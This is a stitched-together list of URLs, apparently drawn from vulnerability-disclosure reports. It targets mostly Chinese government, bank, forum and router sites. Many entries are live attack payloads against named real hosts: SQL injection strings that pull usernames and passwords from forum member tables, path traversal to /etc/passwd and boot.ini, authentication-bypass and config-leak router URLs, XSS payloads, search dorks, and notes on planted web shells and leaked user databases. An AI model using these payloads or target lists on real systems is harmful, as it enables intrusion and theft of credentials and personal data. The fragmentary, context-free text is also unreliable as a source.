http://gov.ishang.net/case/custom.html http://ftpf.ft.gov.cn/News.asp?classid=78 http://fzg.tonghua.gov.cn/pinglun3_alldis.php?yitiid=21 http://jsj.pinghu.gov.cn/SpecialPage/index.aspx?url_pid=174&cateid=360 http://sclz.lss.gov.cn/template/default/newslist.jsp?classId=8a22804434c19b5f0134d0bdb4b0002a http://www.ahshiliang.gov.cn/info.php?left=1&cat_pid=67 http://www.bhzb.gov.cn/q_flfw.asp?lm_id=1023 http://www.bjhrjjjc.gov.cn/group2.php?GroupID=1723 http://www.bzsly.gov.cn/brow.asp?classid=4 http://www.cxqi.gov.cn/E_ReadOpinion.asp?OpinionID=763 http://www.cygsj.gov.cn/sub2_BGXZ.aspx?id=4 
http://www.grjcy.gov.cn/more.aspx?sid=0107 http://www.gybxy.gov.cn/gyfwcla.asp?id=10 http://www.gzgb.gov.cn/Article/?Type=18 http://www.heishan.gov.cn/hsxwsp/index.asp?id=1717 http://www.hygz.gov.cn/news/bgshow.asp?id=83 http://www.jintai.gov.cn/about_view.aspx?id=1651 http://www.jzkfqsafety.gov.cn/kf/msg.asp?id=33 http://www.lishan.gov.cn/aspx/online.aspx?onlineID=4 http://www.lwgajj.gov.cn/news_view.asp?newsid=216 http://www.lyjd.gov.cn/view.asp?id=1535&cid=244 http://www.nmgsports.gov.cn/search.jsp?title_content=all&keyword= http://www.shaoshanxiang.gov.cn/class.asp?id=296&classId=295 http://www.shuikou.gov.cn/news.php?id=950 http://www.sxth.gov.cn/sxyx/changhang.aspx?id=19339 http://www.szzjrmfy.gov.cn/news.php?typeid=159 http://www.tzhymz.gov.cn/getlist.asp?pmid=101&fmid=102 http://www.xjjw.gov.cn/News.asp?Bigid=30 http://www.yclynk.gov.cn/newsview.asp?id=158 http://zx.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1342 php:102行 www.chinacreator.com inurl:comm_front/jbft/guestInfo.jsp?id inurl:web/doc_hit.jsp?documentid inurl:cms/docCount/doc_hit.jsp?documentid http://www.hnagri.gov.cn/comm_front/jbft_zf/guestInfo.jsp?id=25&interview_id=38 http://www.zixing.gov.cn/comm_front/jbft/guestInfo.jsp?id=16&interview_id=18【资兴市人民政府】 http://www.yxx.gov.cn/comm_front/jbft/guestInfo.jsp?id=3&interview_id=2【永兴县人民政府 】 http://www.rc.gov.cn/comm_front/jbft/guestInfo.jsp?id=8&interview_id=38【汝城县人民政府】 http://www.nxcity.gov.cn/comm_front/jbft/guestInfo.jsp?id=20&interview_id=17【宁乡县人民政府 http://www.cetz.gov.cn/comm_front/jbft/guestInfo.jsp?id=25&interview_id=32【国家级长沙经济技术开发区】 http://www.yuanjiang.gov.cn/comm_front/jbft/guestInfo.jsp?id=32&interview_id=35【沅江市人民政府】 http://www.nxgov.com/comm_front/jbft/guestInfo.jsp?id=40&interview_id=52【宁乡县人民政府】 http://www.czlwga.gov.cn:88/comm_front/jbft/guestInfo.jsp?id=22&interview_id=10【临武县公安局】 http://www.hnsx.gov.cn/comm_front/jbft/guestInfo.jsp?id=7&interview_id=10【湖南省郴州市苏仙区门户网站】 
http://www.hnyyjg.com/web/doc_hit.jsp?documentid=61501【湖南医药价格网】 http://222.240.131.230/web/doc_hit.jsp?documentid=135888【湖南医药价格网】 http://www.hn408.org/web/doc_hit.jsp?documentid=61501【湖南残疾人就业信息网】 http://www.hunangtzy.com/web/doc_hit.jsp?documentid=61501【湖南省国土资源信息网】 http://www.nxcity.gov.cn/cms/docCount/doc_hit.jsp?documentid=36133【宁乡县人民政府】 http://www.jkqrc.cn/cms/docCount/doc_hit.jsp?documentid=9132【长沙经开区人才网】 http://www.chengbu.gov.cn/cms/docCount/doc_hit.jsp?documentid=2201【中国·城步 http://www.nxgov.com/cms/docCount/doc_hit.jsp?documentid=25023【宁乡县人民政府】 http://www.cetz.gov.cn/cms/docCount/doc_hit.jsp?documentid=1【国家级长沙经济技术开发区】 http://bbs.xt.ztgame.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%28select%201%20from%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,0x3a,%28select%28select%28SELECT%20concat%28username,0x3a,password%29FROM%20cdb_members%20limit%200,1%29%29from%20information_schema.tables%20limit%200,1%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1%23 http://bbs.xt2.ztgame.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%28select%201%20from%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,0x3a,%28select%28select%28SELECT%20concat%28username,0x3a,password%29FROM%20cdb_members%20limit%200,1%29%29from%20information_schema.tables%20limit%200,1%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1%23 http://bbs.qingcheng.com/vhome.php?mod=search http://www.investhuadu.gov.cn/topic.php?channelID=1&topicID=1 http://www.cn-passion.com/ http://ahtkb.hfut.edu.cn/ahtkb/do.php?ac=query&step=1 http://www.allcom.cn/app/asp/show.asp?id=3935 http://591up.com/views/main/default.aspx?sign= http://www.shanghailaw.gov.cn/portal/reviewpdf/pdfdetails.jsp?pfid=2013315 
http://gamebbs.pps.tv//faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%28select%201%20from%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,0x3a,%28select%28select%28SELECT%20concat%28username,0x3a,password%29FROM%20cdb_members%20limit%200,1%29%29from%20information_schema.tables%20limit%200,1%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1%23 http://bbs.sanguosha.com/forum.php http://bbs.web.kuaiwan.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%28select%201%20from%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,0x3a,%28select%28select%28SELECT%20concat%28username,0x3a,password%29FROM%20cdb_members%20limit%200,1%29%29from%20information_schema.tables%20limit%200,1%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1%23 http://ky.ahedu.gov.cn/ http://ky.ahedu.gov.cn/more.asp?nClass_Id=2 http://bbs.aipai.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%28select%201%20from%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,0x3a,%28select%28select%28SELECT%20concat%28username,0x3a,password%29FROM%20cdb_members%20limit%200,1%29%29from%20information_schema.tables%20limit%200,1%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1%23 http://mobile.psbc.com/ewpdl_1404207502/ebank/mobile/apad/psbcpad.apk http://mobile.psbc.com/ewpdl_1404207263/ebank/mobile/android/android2.0/psbc.apk http://mobile.psbc.com/ewpdl_1404207321/ebank/mobile/android_j/psbc.apk http://www.cebbank.com/static/s_upload/201308/123387655/app/yaoyaojiaofei.apk http://3g.cib.com.cn/userfiles/image/cli/CIBV2.1.1.apk http://mbank.srcb.com/mobile/android/bank_srcb.apk http://www.qdccb.com/survey/cnt_down.jsp?/fwzf/xzzx/rjxz/new/BQDAndroidNfc.apk http://www.qdccb.com/survey/cnt_down.jsp?/fwzf/xzzx/rjxz/new/BQDAndroidBank.apk http://wap.qlbchina.com/ebank/mobile/androidpad/android2.1/QLBChina_pad.apk 
http://wap.qlbchina.com/ebank/mobile/android/android2.1/QLBChina.apk http://download.95526.mobi/sendMessage/downLoadFile/android/android1.5/bob.apk http://www.bocomgroup.com/tw/securities-futures/products-mobile.html http://wap.95559.com.cn/download/client/androidPad/lpc.apk http://wap.95559.com.cn/download/client/android_2g/jtyh2g.apk http://download.hxb.com.cn/mobile/androidpad/HXB_AP_1.3.0.apk http://download.hxb.com.cn/mobile/android/HXB_AM_1.3.0.apk http://www.egbank.com.cn/upload/tools/Androidegb2.apk http://www.hebbank.com/specialimg/zfb/bhb.apk http://app.lenovo.com/app/11394910.html http://wap.95559.com.cn/download/client/android_2g/jtyh2g.apk http://www.cgbchina.com.cn/Info/CMS5_G20306002Resource?info=12584404;res=1401854296884909191424;download= https://play.google.com/store/apps/details?id=com.bankcomm.university http://www.cebbank.com/static/s_upload/201201/71742264/app/ceb_prod_withmap.apk http://apk.gfan.com//Product/App299042.html http://www.mogustore.com/app_show_4620.html http://app.taobao.com/software/detail.htm?appId=396876 http://www.appchina.com/app/com.book.reader/ http://www.nduoa.com/apk/detail/28720 http://app.sogou.com/detail/62219 http://地址:8080/cgi-bin/saveconf http://222.90.29.144:8080/cgi-bin/saveconf http://gamebbs.pipi.cn/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%28select%201%20from%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,0x3a,%28select%28select%28SELECT%20concat%28username,0x3a,password%29FROM%20cdb_members%20limit%200,1%29%29from%20information_schema.tables%20limit%200,1%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1%23 http://bbs.txwy.tw/faq.php?action=grouppermission&gids[99]=&gids[100][0]= http://developer.lenovomm.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema%20.tables%20group%20by%20x%29a%29%23 
http://221.179.6.170:10080/moawap/view/wapMpp/login.action http://221.179.6.170:10080/moa/guige.jsp http://221.179.6.170:10080/moa/css.jsp http://221.179.6.170:10080/moa/ma3.jsp jdbc:oracle:thin:@192.168.1.107:1521:mmdb http://221.179.6.170:10080/tour2)的数据库,可连接 jdbc:oracle:thin:@192.168.1.107:1521:mmdb http://bbs.pl.sdo.com http://bbs.fy.sdo.com http://bbs.gui.sdo.com http://bbs.kk.sdo.com/ http://bbs.xk.sdo.com site:sdo.com inurl:faq.php http://www.xx5.com/bbs/index.php http://govbbs.dbw.cn/bbs/ http://www.hongkongbmw.com/hotel/?id=261 http://www.hongkongbmw.com/hotel/hongkonghotels.asp?area=23 http://bbs.xywy.com/ http://caifang.china.com.cn/ http://bbs.artphoto.people.com.cn/ http://forum.ftxgame.com/ http://xtmc.oritop.com/shixi/admin/ http://www.xtzyyy.com/admin/ http://www.xtguke.com/admin/ http://www.eyehospital.com/admin/ http://www.xtsz.com.cn/admin/ http://www.xtast.org/admin/ http://jingniugqt.com/admin/ http://www.eyehospital.com/About.php?id=4 http://map.sogou.com/bbs/faq.php?action=grouppermission http://bbs.web.teeqee.com http://kindeditor.googlecode.com/files/kindeditor-4.1.10.zip http://pan.baidu.com/s/1eQ***G6 http://td.kuwan8.com/NewsList.aspx?id=697201049870 http://club.zzty.gov.cn/bbs/ http://bbs.lcldl.gov.cn/ http://www.csp.gov.cn/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://www.taobao.com/go/act/sale/tbkelite_mainchannel1.php?callback=alert%281%29 http://115.182.51.172/ http://115.182.51.172/showRoleList http://115.182.51.172/showInfo http://viewugc.17k.com/viewugc/vu_toInsetViewPage.action?insetId=8694#5_8694 http://ask.lenovomobile.com https://ebank.cbhb.com.cn/webappservice/TP050102.do?FileName=../../../../../../../../../../../../../../../../../../../etc/passwd 
http://3g.tv189.com/portal/480/home/wdfw.tar.gz http://3g.tv189.com/portal/wap/home/wdfw.tar.gz http://3g.tv189.com/portal/480/480.tar.gz http://m.ccg.tv189.com/portal/wap/home/wdfw.tar.gz http://jk.tv189.com/admin http://law.tv189.com//struts/webconsole.html bt:/pentest/enumeration/dns/dnsenum# VERSION:1.2 http://wooyun.org/bugs/wooyun-2014-059142 http://sc.wo.com.cn http://sc.wo.com.cn/qidian/Admin/public/login/ http://211.157.166.19:8003/svn/server/ http://www.xiao5u.com/ http://www.xiao5u.com/Demo/School/search.asp www.xiao5u.com http://lovehuge.freebbs.com.tw/ http://www.zybh.gov.cn/ http://www3.zybh.gov.cn/ http://bbs.xmhouse.com/faq.php?action=faq&id=7 http://www.jee-soft.cn/htsite/index.html http://www.jee-soft.cn/htsite/html/cpjfw/cpzx/2012/06/12/1339484245731.html http://office.jee-soft.cn:8080/index.jsp http://oa.jee-soft.cn:8080/index.jsp http://www.jee-soft.cn/htsite/page/platformProduct/getProductList.ht http://office.jee-soft.cn:8080/jasper-upload http://www.xaks.com.cn/showlist.html?sortid=08 https://www.cmpay.com/info/v3/wxzf/wbosver/index.html点击下载,用burp拦截,把verid=000141007878155b0修改成任意喜欢的数字字母,比如verid=iloveyou~~ http://www.ky-express.com/News/ShowNews.aspx?article=800 http://115.182.63.25/ http://115.182.63.25/config.inc http://www.csp.gov.cn/bbs http://e-learning.lenovo.com.cn/forum/faq.php nx.bbn.com.cn/lgy_nzdj/index2.php?member_id=19399&ID=21 http://author.zjol.com.cn/jeecms/LoginAloneInput.jspx http://www.tudou.com/programs/view/MXoDunSp3XY/ http://index.tudou.com/mydata/videolist/t http://index.youku.com/vr_show/showid_vMXoDunSp3XY?type=tudou http://mall.cmbchina.com/Product/S12-501-058-02_081.htm http://www.siwe.com.cn/anonymous/home/indexHome.action http://webgame.553.com/member/find www.553.com url:http://nb.gfan.com/ http://nb.gfan.com http://地址:1080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd http://地址:1080/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 http://地址:1080/st_device.php?NO_NEED_AUTH=1&AUTH_GROUP=0 
http://oa.sxpmg.com/defaultroot/sp/login.jsp http://oa.sxpmg.com//defaultroot/sp/desktop.jsp?isLogin=1 http://sqlmap.org http://www.teatree.cn/,又名茶树网,涉及到的两个网站:一个是www.teatreexy.com这个是在线教育网站(茶树网学院),另一个是www.teatree.cn,这是个中国电信大学生就职服务平台(茶树网)。 http://www.teatree.cn/register_success.aspx?LoginName=1。 www.teatree.cn,但是进行服务器以后,也看到了www.teatreexy.com的站~~,下面把过程和证据拿出来: www.teatree.cn中就有4600+多个大学,很多都是解放军什么什么大学学院什么的,这里就不贴出来了,我害怕兵哥哥,www.teatree.cn站的uerinfo一个表中就有34W多的用户信息,姓名,用户名,密码,邮箱,电话等,还有很多很多企业的信息,看图 http://www.ec.ccoo.cn/nopwd.asp http://60.195.248.83/mail/send.asp?toMail=frankpraha@hotmail.com&content=%C4%FA%D4%DA%B3%C7%CA%D0%CD%A8%B8%F6%C8%CB%B0%E6%D6%D0%B5%C4%B5%C7%C2%BD%D0%C5%CF%A2:%3CBr%3E%B5%C7%C2%BD%D5%CA%BA%C5%A3%BAqqid5053505%3CBr%3E%B5%C7%C2%BD%C3%DC%C2%EB%A3%BA319091%3CBr%3E&title=%C4%FA%D4%DA%B3%C7%CA%D0%CD%A8%B8%F6%C8%CB%B0%E6%D6%D0%B5%C4%B5%C7%C2%BD%D0%C5%CF%A2&webhref=http://www.ec.ccoo.cn/nopwdsave2.asp?uname=qqid5053505 http://demo.oa8000.com http://tieba.baidu.com/p/3142031881 http://pan.baidu.com/mbox/homepage#share/type=session http://app.qiushibaike.com/的mongodb数据库存在未授权访问,未对数据库设置密码,任何人都能访问,并查看信息 http://wooyun.org/bugs/wooyun-2010-058322,那个../cargo/udn.aspx的马已经被删了,尝试了一下下载网站备份压缩包,发现还是可以下载的 data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://15270227547.blog.sohu.com/304058734.html http://www.baidu.com data:text/html;base64,PGlmcmFtZSBzcmM9aHR0cDovL3d3dy5iYWlkdS5jb20gd2lkdGg9ODAwIGhlaWdodD04MDA+PC9pZnJhbWU+ http://15270227547.blog.sohu.com/304072155.html http://act.blog.sohu.com/plus/impeach.jsp?rp=aaa http://act.blog.sohu.com/plus/impeach.jsp?rp= http://xxxxxx http://act.blog.sohu.com/plus/impeach.jsp?rp= http://xxxxxx data:text/html;base64,语句…… http://15270227547.blog.sohu.com/304072236.html VERSION:1.2 http://地址:8080/cliget.cgi?cmd=$sys_model%;$hw_cver%;$sw_ver% http://地址:8080/cliget.cgi?cmd=$sys_user1%;$lan_ip%;$lan_msk%;status%20wan_ip%;status%20wan_mask%;status%20wan_gw%;status%20dns1%;status%20dns2% 
http://62.64.0.209/cliget.cgi?cmd=$sys_user1%;$lan_ip%;$lan_msk%;status%20wan_ip%;status%20wan_mask%;status%20wan_gw%;status%20dns1%;status%20dns2% http://www.hljgh.org/newsview.jsp?newsid=832 url:http://cmdp.ncc.cma.gov.cn/drought/lfrost/station.php?1=1&act=stationList&control=list http://pay.5see.com/Pay/LyPay?gameid=wycq http://share.shop.letv.com/admin.php http://api.m.taobao.com/rest/api2.do?api=mtop.shop.getsellerRate&v=1.0&data={"shopId":"62458045","pageNo":"1","pageSize":"10","rateResult":"1"}&type=jsonp&callback=jsonp4 ID:2154815291 http://jianghu.taobao.com/u/MjE1NDgxNTI5MQ==/front.htm http://my.taobao.com/UvCHbMmgYMFISvQTT http://rate.taobao.com/user-rate-UvCHbMmgYMFISvQTT.htm https://u.m.taobao.com/reg/retrieve_pwd_index.htm?_input_charset=utf-8&sid=c3b6df8b0e7be57c02ae608e6d8e9295&ttid=255200%40taobao_android_4.5.0 ID:2154815291 http://jianghu.taobao.com/u/MjE1NDgxNTI5MQ==/front.htm http://rate.taobao.com/user-rate-UvCHbMmgYMFISvQTT.htm http://card.ztcard.cn/index.php http://card.ztcard.cn/load_userinfo.php http://www.ejingmai.com/user/order/show-352570.html http://www.ejingmai.com/user/order/show-352571.html http://www.ejingmai.com/user/order/show-352572.html http://www.ejingmai.com/user/order/show-352573.html http://www.tacourt.gov.cn/showdetail.jsp?pxh=3&progbh=03&axh=3417 http://www.taishancourt.gov.cn/display.asp?id=298 http://www.taishancourt.gov.cn/admin/login.asp http://www.xtfy.gov.cn/Manage/admin.asp http://www.xtfy.gov.cn/Manage/admin.asp http://purenetworks.com/HNAP1/GetWLanSettings24 http://wooyun.org/bugs/wooyun-2010-045677 http://zone.wooyun.org/content/11096 http://app.client.letv.com/config.inc.php user:c*** user:c*** http://220.181.117.74:80/letv/.svn/entries http://wooyun.org/bugs/wooyun-2010-059172 http://www.sxmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxycmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.jcmzj.gov.cn/content/topicdeal.jsp?id=1&action=read 
http://www.sxlfmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.dtcqmzj.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxszmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.yqmzj.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxfb.gov.cn/content/topicdeal.jsp?id=1&action=read http://sxfb.gov.cn/user/reguser.jsp?id=&step=2&action=new http://v.ntzx.cn/home.php?id=10 http://www.qzetv.net/home.php?id=1 http://data.sports.sohu.com/equipment/goods_list.php?category=1&cat_id_list=7 http://www.uzhe.com/ admin:admin http://purenetworks.com/HNAP1/GetWLanRadioSettings jsp:useBean http://192.168.10.64:9992/e/member/index.aspx?s=1&type=mem_favolst http://book.haedu.cn/book/view.asp?bh=278818 http://210.38.120.140:8080/zplug/ajax_asyn_link.php?url=../opac/search.php http://lib.czmec.cn/opac/zplug/ajax_asyn_link.php?url=../opac/search.php http://lib.stdu.edu.cn/hwweb/zplug/ajax_asyn_link.php?url=../opac/search.php http://210.38.120.140:8080/zplug/ajax_asyn_link.php?url=../../../../../../../../../../boot.ini http://58.16.9.203:8080/gzdd/login.action http://地址:8080/save_configuration.cgi http://dawww.ynnu.edu.cn/plus/login.aspx http://0738wo.com/login.asp http://123.139.154.143/tclc/index.jsp inurl:virtualhall/instance/ http://***.gov.cn/virtualhall/instance/searchinfo.jsp?flownum= http://agent.leadsec.com.cn/agent/countryProvinceChange.htm?currTime=Tue%20Jul%2001%202014%2009:15:09%20GMT+0800 http://drops.wooyun.org/wp-content/themes/GZai/kindeditor/php/file_manager_json.php?path=/data1/www/htdocs/646/wydrops/2/&dir=image http://地址/cgi-bin/passwd.cgi http://58.61.144.23/cgi-bin/passwd.cgi en.sau.edu.cn/eventsDetail.asp?D_id=1541 http://lib.sau.edu.cn/VoteSave.aspx?SubjectID=2 http://lib.sau.edu.cn/VoteSave.aspx?SubjectID=2 http://sqlmap.org http://drops.wooyun.org/webview.html http://oa.tjfsu.edu.cn/login.asp http://vos.tjufe.edu.cn/login.asp http://www.shhjwl.com/vos/login.asp http://cqkyoa.oicp.net/login.asp http://oa.hjshy.com/login.asp 
http://www.cnshuiyu.com/login.asp http://www.fzsyxx.com/oa/ http://211.68.250.42/login.asp http://211.68.192.21/login.asp http://60.171.34.204:8086/ http://121.30.226.44/login.asp http://116.228.82.237/login.asp http://180.166.7.94/login.asp http://VICTIM.COM/loginverify.asp http://oa.tjfsu.edu.cn/loginverify.asp http://地址/status_dev_info_t.gch http://地址/manager_dev_config_t.gch http://地址/wlan_security.gch http://地址/manager_log_conf_t.gch http://se.360.cn/ http://chrome.360.cn/ Author:wdlinux QQ:12571192 Url:http://www.wdlinux.cn/wdcp http://219.118.247.53/view/view.shtml http://www.webworldcam.com/webcam-index.php?var=11966&site=http://12.154.142.171/view/view.shtml https://www-n.oca.eu/general/services/meteo/camera-c1.htm http://86.56.142.34/view/view.shtml http://gzjd.hubzs.com.cn/login!init.action http://wq.tom.com/include/inuc.php?zkes5/show/TmvR.rar http://eu.s.detprod.com/ouk2nfucljpw49un.js?"+N6ERcfj http://uhjhg9x9fhrf.syysw.cn/index.php?EdxZh/list/DjQ.html_1404490158000 http://www.cc.cdut.edu.cn/ baoku.baidu.com/search.php,word参数。 http://ge2bbs.9hgame.com/ http://websec.intersecnet.com/login.action搞进去(struts2) http://websec.intersecnet.com/guige.jsp马地址 http://websec.intersecnet.com/jyhack.txt黑页一个 http://96361.xyhdz.gov.cn/jigou.php?id=42 http://ahfp.ah.gov.cn/information.jsp?xmid=2034 http://blwl.bl.gov.cn/bljh_1.aspx?id=102 http://bz.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://ctq.hd.gov.cn/source/list/qzzy_list.asp?id=4 http://ftpf.ft.gov.cn/News.asp?classid=78 http://fzb.ahsz.gov.cn/openxw.asp?id=41041 http://fzb.chancheng.gov.cn/news/view.asp?id=3630 http://fzg.tonghua.gov.cn/pinglun3_alldis.php?yitiid=21 http://gbjy.ggedu.gov.cn/list.aspx?cid=1 http://gk.jxwy.gov.cn/ecms/IndexServlet?siteID=2&nodeID=55010 http://gxs.qz.gov.cn/newslist.asp?id=14 http://gyrsj.gov.cn/tmp/wzpm.shtml?show=list&UI_ID=2 http://hbjgczl.tongchuan.gov.cn/list.aspx?id=1 http://hlxxgk.lbx.gov.cn/GPI/index.aspx?dept=92338301 
http://hrss.jldl.gov.cn/?mod=index&act=article&doing=list&cid=2 http://jjw.huzhou.gov.cn/zt_xjhd/zt.asp?bigfeatureid=20 http://jsj.nanan.gov.cn/?ctl=index&act=list&category_code=67108864 http://jsj.pinghu.gov.cn/SpecialPage/index.aspx?url_pid=174&cateid=360 http://ldj.cqyc.gov.cn/Page/zw_jzxx_Content.aspx?id=2779 http://m.wtlz.gov.cn/list.asp?type=2&c=20107895055150 http://m.ypbxygw.gov.cn/list.asp?type=2&c=20107895055150 http://md.dali.gov.cn/article_show_mdgk.asp?articleid=24215 http://mzj.xinxiang.gov.cn/zxnr.asp?classid=1&id=5940 http://nsrxx.hazz-l-tax.gov.cn/nsrxx/list/spbf.do?b_spbf=true&spid=27 http://people.nbfet.gov.cn/hyzsxi.php?id=519 http://rc.szxcdj.gov.cn/infodisp.asp?id=615 http://sclz.lss.gov.cn/template/default/newslist.jsp?classId=8a22804434c19b5f0134d0bdb4b0002a http://st.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://szlb.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://szxx.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://tea.hsq.gov.cn/list_tp.asp?sort_id=578 http://tw.daqing.gov.cn/nzcms_list_news.asp?id=743&sort_id=657 http://tyj.zgwj.gov.cn/UpFile/template/firstpage/wjtyw_current/TywWebMessage.aspx?xftype=3 http://wh.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://www.167.gov.cn/167jtcontent.aspx?ArticleID=781 http://www.ahczzx.gov.cn/ShowNews.asp?id=5563 http://www.ahjjjc.gov.cn/article.php?MsgId=91430 http://www.ahshiliang.gov.cn/info.php?left=1&cat_pid=67 http://www.ahszkj.gov.cn/content/info.php?Pid=1&ty=2 http://www.ahzbtb.gov.cn/include/web_content.php?id=446 http://www.alsyqdj.gov.cn/jcdj_show.asp?newsid=64 http://www.aqzyjjjc.gov.cn/article.php?MsgId=91428 http://www.asga.gov.cn/newsDetail.aspx?id=17125 http://www.bhzb.gov.cn/q_flfw.asp?lm_id=1023 http://www.bjdag.gov.cn/newlist.php?id=24 http://www.bjhrjjjc.gov.cn/group2.php?GroupID=1723 http://www.bjszfj.gov.cn/newlist.php?id=5 http://www.bzsly.gov.cn/brow.asp?classid=4 http://www.chssf.gov.cn/about.php?id=1 http://www.chty.gov.cn/Mlty.php?classid=7 
http://www.cxqi.gov.cn/E_ReadOpinion.asp?OpinionID=763 http://www.cygsj.gov.cn/sub2_BGXZ.aspx?id=4 http://www.djkfda.gov.cn/jgjj.asp?id=398 http://www.dstz.gov.cn/dstz/bbjsxs1.asp?id=24 http://www.edu-gzstats.gov.cn/show/showarticle.asp?ID=770 http://www.fengquan.gov.cn/lyny.php?id=21 http://www.fhagri.gov.cn/lzwh/imagesview.asp?P_ID=611 http://www.fjzzrd.gov.cn/web/cwhgk.asp?LMid=25 http://www.fssrd.gov.cn/xwy.asp?wb=1&bh=937 http://www.gdmz.gov.cn/bbs/rss.php?auth=0 http://www.grcz.gov.cn/zixun_detail.jsp?id=424 http://www.grjcy.gov.cn/more.aspx?sid=0107 http://www.gybxy.gov.cn/gyfwcla.asp?id=10 http://www.gzgb.gov.cn/Article/?Type=18 http://www.heishan.gov.cn/hsxwsp/index.asp?id=1717 http://www.hnzx.gov.cn/detailP.aspx?id=2254 http://www.hygz.gov.cn/news/bgshow.asp?id=83 http://www.jintai.gov.cn/about_view.aspx?id=1651 http://www.jjfc.gov.cn/class_2.asp?classid=40&newsid=498 http://www.jjjt.gov.cn/page/col1_lb.php?lbid=657 http://www.jjsf.gov.cn/Browse/InfoD.aspx?Board=1801 http://www.jrfgw.gov.cn/onews.asp?id=2468 http://www.jsycjw.gov.cn/oldjjw/3.asp?id=69 http://www.jzkfqsafety.gov.cn/kf/msg.asp?id=33 http://www.kscein.gov.cn/Information/Information_View.aspx?Contentid=8498 http://www.lasw.gov.cn/list/index.php?zlm=1 http://www.lcczj.gov.cn/Article_Class.asp?ClassID=44 http://www.lishan.gov.cn/aspx/online.aspx?onlineID=4 http://www.llny.gov.cn/index_list.aspx?id=60 http://www.lqmz.gov.cn/type.asp?ID=1 http://www.lwgajj.gov.cn/news_view.asp?newsid=216 http://www.lyjd.gov.cn/view.asp?id=1535&cid=244 http://www.mldw.gov.cn/chief/index.php?ty=182 http://www.ncfdj.gov.cn/CongYeZhuTiXianShi.aspx?ID=20 http://www.nmciq.gov.cn/hdpd/myzj/myzjadd.jsp?id=672 http://www.nmgmr.gov.cn/search.jsp?title_content=all&keyword= http://www.nmgsports.gov.cn/search.jsp?title_content=all&keyword= http://www.nmqs.gov.cn/search.jsp?keyword= http://www.phbi.gov.cn/readnews.asp?id=4213 http://www.pjw.gov.cn/pwsjxx/xj_xx.asp?id=900 http://www.pjzxw.gov.cn/Zxdt.Asp?cid=2 
http://www.qxn.gov.cn/Search.html?Q=%E9%99%88%E9%B8%A3%E6%98%8E http://www.qy.gov.cn/Vote.aspx?Id=8 http://www.qzrf.gov.cn/cjwtlist.aspx?t=1 http://www.sasacgs.gov.cn/leader.jsp?classid=23 http://www.scncjt.gov.cn/mail.aspx?type=2 http://www.shaoshanxiang.gov.cn/class.asp?id=296&classId=295 http://www.shcredit.gov.cn/e_lmwz_list.jsp?colid1=2&colid2=37 http://www.shuikou.gov.cn/news.php?id=950 http://www.slpop.gov.cn/content.do?method=sendTo&cid=106 http://www.snciq.gov.cn/ysqgkzzjg.jsp?urltype=tree.TreeTempUrl&wbtreeid=18341 http://www.sxsd.gov.cn/about_list.aspx?id=5&oid=1 http://www.sxth.gov.cn/sxyx/changhang.aspx?id=19339 http://bs.jl.gov.cn/BsWebCms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/jsp/connector http://www.gzzb.gov.cn/ http://www.gzzb.gov.cn/NewsList.aspx?InfoType=工作动态 http://www.gzzb.gov.cn/NewsList.aspx?InfoType=工作动态 http://sqlmap.org http://bbs.58game.com/uc_server/ http://ahshiliang.gov.cn/info_ztbd.php?left=3&cat_pid=4&cat_pidzt=78 http://jyzx.scau.edu.cn:81/) http://jyzx.scau.edu.cn:81/cnews/2014/07/03/160146NxVw.html http://202.116.174.108:8080/reader/login.php) www.ggj.hbjt.gov.cn http://www.ggj.hbjt.gov.cn/ggj/news/listSpecial.jsp?artColumn=030310 http://www.ggj.hbjt.gov.cn/ggj/news/listSpecial.jsp?ar http://sqlmap.org http://www.cdedu.gov.cn/service/index.aspx?isc_id=29 http://www.zxg365.com/personal/yl.php?yhid= http://gd.189.cn/biz/bill/queryProdList.action http://www.lc96228.com/NewsShow.aspx?ctype=4&id=20&pid=7 http://wooyun.org/bugs/wooyun-2010-061213 http://oa.h***y.com/InforForWeb/OA_Image1.asp?value=1588&type=b http://oa.h***y.com/InforForWeb/index.asp?classid=1&SubClassID=4 